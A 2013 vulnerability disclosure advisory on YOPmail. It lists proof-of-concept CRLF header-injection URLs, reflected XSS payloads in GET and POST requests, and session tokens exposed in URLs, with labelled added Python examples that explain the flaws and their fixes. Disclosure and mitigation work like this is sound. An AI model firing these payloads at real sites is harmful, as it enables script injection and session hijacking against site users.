YOPMail XSS / Injection / HTTP Response Splitting

Date: 28 Jun 2013 00:00:00
Reported by: Juan Carlos Garcia
Type: packetstorm
Source: packetstormsecurity.com

YOPMail CRLF Injection-HTTP Response Splitting and XSS

Code
`YOPMAIL (Anonymous & Free email address) CRLF Injection-HTTP Response Splitting / XSS / Session Token in URL  
==================================================================================================================================================  
  
  
Report-Timeline:  
================  
2013-06-01: Researcher Notification   
2013-06-03: RESPONSE  
2013-06-07: Ask About the issues  
2013-06-10: Vendor Feedback  
2013-06-13: Not Fixed  
2013-06-16: Ask About the Issues  
2013-06-27: Not Fixed / No Response  
2013-06-28: Full Disclosure  
  
  
I-VULNERABILITIES  
======================  
  
#Title: YOPMAIL (Anonymous & Free email address) YopMail CRLF Injection-HTTP Response Splitting / XSS / Session Token in URL  
  
#Vendor: http://www.yopmail.com  
  
#Author: Juan Carlos García (@secnight)  
  
#Follow me   
http://www.highsec.es  
http://hackingmadrid.blogspot.com  
Twitter:@secnight  
  
  
II-Introduction:  
======================  
YOPmail (Your Own Protection mail) is a temporary e-mail service. Messages are kept for 8 days.   
It is possible to send a message to another YOPmail address. No registration is required. Firefox, Internet Explorer 7 and Opera add-ons are downloadable. There are alternate domains.  
  
Domains  
  
@yopmail.fr  
@yopmail.net  
@cool.fr.nf  
@jetable.fr.nf  
@nospam.ze.tc  
@nomail.xl.cx  
@mega.zik.dj  
@speed.1s.fr  
@courriel.fr.nf  
@moncourrier.fr.nf  
@monemail.fr.nf  
@monmail.fr.nf  
@mail.mezimages.net  
The site has new domains every three months.  
  
  
III-PROOF OF CONCEPT  
======================  
  
CRLF INJECTION-HTTP RESPONSE SPLITING  
______________________________________  
  
The CRLF Injection attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Attackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include cross-site scripting (XSS), cross-user defacement, poisoning of the client's web cache, hijacking of web pages, defacement and a myriad of other related attacks.  
  
Attacks  
-------  
  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919  
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717  
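The mechanics behind the cr.php?cfg= URLs above, as an added example that is not code from the advisory or from YOPmail: decoding the parameter exposes the CR/LF it carries, a naive copy of it into a response header shows the response head splitting into an extra line, and a header setter that refuses control characters is the server-side fix. The response template and the names are constructed for this illustration.

```python
from urllib.parse import urlsplit, parse_qs

# One of the PoC URLs quoted in the advisory above.
POC_URL = ("http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader"
           "%3ainjected_by_secnight&r=524")


def decoded_cfg(url: str) -> str:
    """Percent-decode the cfg parameter the way a server-side $_GET lookup would."""
    return parse_qs(urlsplit(url).query)["cfg"][0]


def naive_response(cfg: str) -> bytes:
    """Vulnerable pattern (constructed): the raw parameter is copied into a header,
    so the embedded CRLF terminates that header and starts a new line."""
    return b"HTTP/1.1 200 OK\r\nSet-Cookie: cfg=" + cfg.encode() + b"\r\n\r\n"


def header_lines(raw: bytes) -> list[str]:
    """Split a raw response head into its header lines, as a client parser would."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return head.decode().split("\r\n")[1:]


class BadHeaderValue(ValueError):
    pass


def safe_header(name: str, value: str) -> str:
    """Mitigation: reject any CR, LF or other control character in a header value
    instead of letting it reach the wire."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in value):
        raise BadHeaderValue(f"control character in header {name!r}")
    return f"{name}: {value}"


if __name__ == "__main__":
    cfg = decoded_cfg(POC_URL)
    print(repr(cfg))
    print(header_lines(naive_response(cfg)))  # two lines instead of one
    try:
        safe_header("Set-Cookie", "cfg=" + cfg)
    except BadHeaderValue as exc:
        print("rejected:", exc)
```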
  
  
Multiple CROSS SITE SCRIPTING  
_______________________________  
  
The concept of XSS is to manipulate client-side scripts of a web application so that they execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which is executed every time the page is loaded, or whenever an associated event is performed.  
  
Attacks  
--------  
  
Below I list only some of the vulnerable locations, because this web service contains many failures of this type. So much XSS.  
  
Affected items  
/add-domain.php   
/alternate-domains.php   
/alternate-email-address.php   
/conditions.php   
/contact.php   
/definitions/email-jetable.php   
/definitions/mail-anonyme.php   
/definitions/spam.php   
/donation.php   
/email-anonyme.php   
/email-generator.php   
/en   
/en/add-domain.php   
/en/alternate-domains.php   
/en/alternate-email-address.php   
/en/conditions.php   
/en/contact.php   
/en/definitions   
/en/definitions/email-jetable.php   
/en/definitions/mail-anonyme.php   
/en/definitions/spam.php   
/en/donation.php   
/en/email-anonyme.php   
/en/email-generator.php   
/en/faq.php   
/en/images   
/en/index.php   
/en/plugins.php   
/en/privacy.php   
/en/send-mail.php   
/en/style   
/en/style/pic   
/en/yopmail-chat.php   
/es   
/es/add-domain.php   
/es/alternate-domains.php   
/es/alternate-email-address.php   
/es/conditions.php   
/es/contact.php   
/es/definitions   
/es/definitions/email-jetable.php   
/es/definitions/mail-anonyme.php   
/es/definitions/spam.php   
/es/donation.php   
/es/email-anonyme.php   
/es/email-generator.php   
/es/faq.php   
/es/images   
/es/index.php   
/es/plugins.php   
/es/privacy.php   
/es/send-mail.php   
/es/style   
/es/style/pic   
/es/yopmail-chat.php   
/faq.php   
/fr   
/fr/add-domain.php   
/fr/alternate-domains.php   
/fr/alternate-email-address.php   
/fr/conditions.php   
/fr/contact.php   
/fr/definitions   
/fr/definitions/email-jetable.php   
/fr/definitions/mail-anonyme.php   
/fr/definitions/spam.php   
/fr/donation.php   
/fr/email-anonyme.php   
/fr/email-generator.php   
/fr/faq.php   
/fr/images   
/fr/index.php   
/fr/plugins.php   
/fr/privacy.php   
/fr/send-mail.php   
/fr/style   
/fr/style/pic   
/fr/yopmail-chat.php   
/index.php   
/it   
/it/add-domain.php   
/it/alternate-domains.php   
/it/alternate-email-address.php   
/it/conditions.php   
/it/contact.php   
/it/definitions   
/it/definitions/email-jetable.php   
/it/definitions/mail-anonyme.php   
/it/definitions/spam.php   
/it/donation.php   
/it/email-anonyme.php   
/it/email-generator.php   
/it/faq.php   
/it/images   
/it/index.php   
/it/plugins.php   
/it/privacy.php   
/it/send-mail.php   
/it/style   
/it/style/pic   
/it/yopmail-chat.php   
/pl   
/pl/add-domain.php   
/pl/alternate-domains.php   
/pl/alternate-email-address.php   
/pl/conditions.php   
/pl/contact.php   
/pl/definitions   
/pl/definitions/email-jetable.php   
/pl/definitions/mail-anonyme.php   
/pl/definitions/spam.php   
/pl/donation.php   
/pl/email-anonyme.php   
/pl/email-generator.php   
/pl/faq.php   
/pl/images   
/pl/index.php   
/pl/plugins.php   
/pl/privacy.php   
/pl/send-mail.php   
/pl/style   
/pl/style/pic   
/pl/yopmail-chat.php   
/plugins.php   
/privacy.php   
/ru   
/ru/add-domain.php   
/ru/alternate-domains.php   
/ru/alternate-email-address.php   
/ru/conditions.php   
/ru/contact.php   
/ru/definitions   
/ru/definitions/email-jetable.php   
/ru/definitions/mail-anonyme.php   
/ru/definitions/spam.php   
/ru/donation.php   
/ru/email-anonyme.php   
/ru/email-generator.php   
/ru/faq.php   
/ru/images   
/ru/index.php   
/ru/plugins.php   
/ru/privacy.php   
/ru/send-mail.php   
/ru/style   
/ru/style/pic   
/ru/yopmail-chat.php   
/send-mail.php   
/uk   
/uk/add-domain.php   
/uk/alternate-domains.php   
/uk/alternate-email-address.php   
/uk/conditions.php   
/uk/contact.php   
/uk/definitions   
/uk/definitions/email-jetable.php   
/uk/definitions/mail-anonyme.php   
/uk/definitions/spam.php   
/uk/donation.php   
/uk/email-anonyme.php   
/uk/email-generator.php   
/uk/faq.php   
/uk/images   
/uk/index.php   
/uk/plugins.php   
/uk/privacy.php   
/uk/send-mail.php   
/uk/style   
/uk/style/pic   
/uk/yopmail-chat.php   
/yopmail-chat.php   
/zh   
/zh/add-domain.php   
/zh/alternate-domains.php   
/zh/alternate-email-address.php   
/zh/conditions.php   
/zh/contact.php   
/zh/definitions   
/zh/definitions/email-jetable.php   
/zh/definitions/mail-anonyme.php   
/zh/definitions/spam.php   
/zh/donation.php   
/zh/email-anonyme.php   
/zh/email-generator.php   
/zh/faq.php   
/zh/images   
/zh/index.php   
/zh/plugins.php   
/zh/privacy.php   
/zh/send-mail.php   
/zh/style   
/zh/style/pic   
/zh/yopmail-chat.php   
  
Method GET  
----------  
  
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec  
  
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec  
  
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid  
  
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E  
  
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E  
  
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E  
  
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E  
  
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E  
  
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E  
  
Method POST  
------------  
  
http://www.yopmail.com:80/send-mail.php  
  
Request Data  
  
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&[email protected]&[email protected]&[email protected]  
  
http://www.yopmail.com:80/send-mail.php  
  
Request Data  
  
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&[email protected]&[email protected]&[email protected]  
  
http://www.yopmail.com:80/send-mail.php  
  
Request Data  
  
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&[email protected]&[email protected]&[email protected]  
  
http://www.yopmail.com:80/zh/send-mail.php  
  
Request Data  
  
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&[email protected]&[email protected]  
  
http://www.yopmail.com:80/zh/send-mail.php  
  
Request Data  
  
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&[email protected]&[email protected]&[email protected]  
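An added example, not part of the advisory: the reflected fragments from the GET PoC URLs above, percent-decoded as the server-side script receives them, rendered into an attribute with and without context-aware escaping. The input template and the breaks_out check are constructed for this illustration, not taken from YOPmail.

```python
import html
from urllib.parse import unquote

# Payload fragments quoted in the advisory's GET PoCs, decoded as the server sees them.
PAYLOADS = {
    "login": unquote("secnight%27%28%hackingmadrid"),
    "path": unquote("1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E"),
    "attr": unquote("%22onmouseover=prompt(908426)%3E"),
}

PREFIX, SUFFIX = '<input name="login" value="', '">'  # constructed template


def render_unsafe(value: str) -> str:
    """Vulnerable pattern: the reflected value is copied into markup verbatim."""
    return PREFIX + value + SUFFIX


def render_safe(value: str) -> str:
    """Fix: HTML-escape &, <, >, " and ' before reflecting into an attribute."""
    return PREFIX + html.escape(value, quote=True) + SUFFIX


def breaks_out(rendered: str) -> bool:
    """True if the reflected part still holds a raw quote or angle bracket, i.e.
    it can close the attribute or open a new tag (the advisory's XSS)."""
    body = rendered[len(PREFIX):len(rendered) - len(SUFFIX)]
    return any(ch in body for ch in '<>"\'')


if __name__ == "__main__":
    for name, value in PAYLOADS.items():
        print(name, "unsafe:", breaks_out(render_unsafe(value)),
              "safe:", breaks_out(render_safe(value)))
```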
  
  
SESSION TOKEN IN URL  
____________________  
  
This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL. URLs could be logged or leaked via the Referer header.  
  
Affected items  
--------------  
  
/cr.php (78a3a31e275b316f36665b35eb4bfe21)   
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)   
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)   
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)   
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)   
  
Examples  
  
Method GET  
----------  
  
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&  
  
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
Method POST  
-----------  
  
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
Request Data  
  
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&[email protected]&[email protected]&[email protected]  
  
  
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6  
  
Request Data  
  
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&[email protected]&[email protected]&[email protected]  
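The leak paths named in this section (request URLs written to access logs, and the token travelling onward in the Referer header) can be found in existing logs with a small scanner; this is an added example, not code from the advisory, and the log lines are constructed for it, reusing the PHPSESSID value quoted above.

```python
import re

# A PHP session id passed as a query parameter, in a request line or a Referer URL.
# The value charset covers PHP's session id alphabet (alphanumerics plus ',' and '-').
SESSION_PARAM = re.compile(r"([?&]PHPSESSID=)([A-Za-z0-9,-]+)")

# Constructed combined-log-format lines for this example.
LOG_LINES = [
    '203.0.113.5 - - [28/Jun/2013:10:00:01 +0000] "GET /fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1" 200 512 "-" "UA"',
    '203.0.113.5 - - [28/Jun/2013:10:00:02 +0000] "GET /en/faq.php HTTP/1.1" 200 1024 "http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6" "UA"',
    '198.51.100.7 - - [28/Jun/2013:10:00:03 +0000] "GET /en/index.php HTTP/1.1" 200 2048 "-" "UA"',
]


def find_token_leaks(lines):
    """Return (line_no, where, token) for each session id found in the request
    line ('request') or the Referer field ('referer') of every log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split('"')  # [prefix, request, status/size, referer, ' ', ua, '']
        request, referer = fields[1], fields[3]
        for where, text in (("request", request), ("referer", referer)):
            for m in SESSION_PARAM.finditer(text):
                hits.append((n, where, m.group(2)))
    return hits


def redact(line):
    """Replace the token value so the line can be retained without the secret."""
    return SESSION_PARAM.sub(r"\1[REDACTED]", line)


if __name__ == "__main__":
    for hit in find_token_leaks(LOG_LINES):
        print(hit)
    for line in LOG_LINES:
        print(redact(line))
```

On the application side, PHP's session.use_only_cookies=1 and session.use_trans_sid=0 stop the token from being accepted from or written into URLs in the first place; the scanner only finds what has already been logged.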
  
  
  
IV. CREDITS  
-------------------------  
  
These vulnerabilities were discovered  
by Juan Carlos García (@secnight)  
  
  
V. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`
